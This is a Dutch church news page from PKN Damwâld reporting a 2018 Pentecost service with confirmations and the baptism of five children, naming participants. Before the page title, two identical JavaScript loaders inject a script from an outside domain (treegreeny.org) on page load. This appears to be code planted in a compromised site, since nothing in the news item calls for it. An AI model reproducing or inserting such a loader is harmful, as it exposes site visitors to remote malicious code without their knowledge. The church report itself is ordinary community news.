;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pinksterzondag in teken van belijdenis en doop - PKN Damwâld

Pinksterzondag in teken van belijdenis en doop

Gepubliceerd op: woensdag 23 mei 2018

Pinkersteren stond dit jaar wel in het heel bijzonder teken. Waar normaal een preekdienst wordt gehouden over de uitstorting van de heilige geest, een dienst in woorden, was het nu een dienst met daden. Pinksteren was te zien. Het werk van de heilige geest in de belijdenis en doop.

Belijdenis werd gedaan door:

Kas Huizenga en Sjoukje Huizenga-Visser, Tabe de Jong en Lisa Miedema, Sietze Kommerie en Alie Falkena- Kommerie,  Sietze Kooistra en Antje Kooistra-Visser, Keimpe Reitsma en Aafke Margriet Wiegersma, Henk-Jan van der Valk en Anita Sijtsma. Kas werd vooraf gedoopt.

In een korte preek vanuit Jesaja 41 vers 8 tot en met 10 vertelde Boukes dat je als onzekere mensen in het geloof mag vertrouwen op God, waarbij God zegt: Kijk niet bang om je heen, Kijk ook niet onzeker in je hart, Kijk naar mij, want Ik ben bij je, Ik ben je God. Ik geef je kracht, help je en sta naast je. Daarom is het vandaag ook Pinksteren, de heilige geest is er. Waar die geest is, is god zelf. Hij wil wonen bij de mensen, in ons, in de kerk, overal waar mensen geloven.

Na de preek werd de doop bediend aan 5 kinderen; Boaz-Metske en Lukas Doeke Kooistra, Jinthe Kommerie, Gerard van der Valk en Jens de Jong.

We kunnen terug zien op een bijzondere en feestelijke dienst.

Foto’s:

In het foto album staan alle gemaakte foto’s tijdens de dienst. Foto’s kunnen direct van de website worden gedownload of wanneer gewenst in een hogere kwaliteit voor afdrukken bij Roel van Veen. email r.vdveen@knid.nl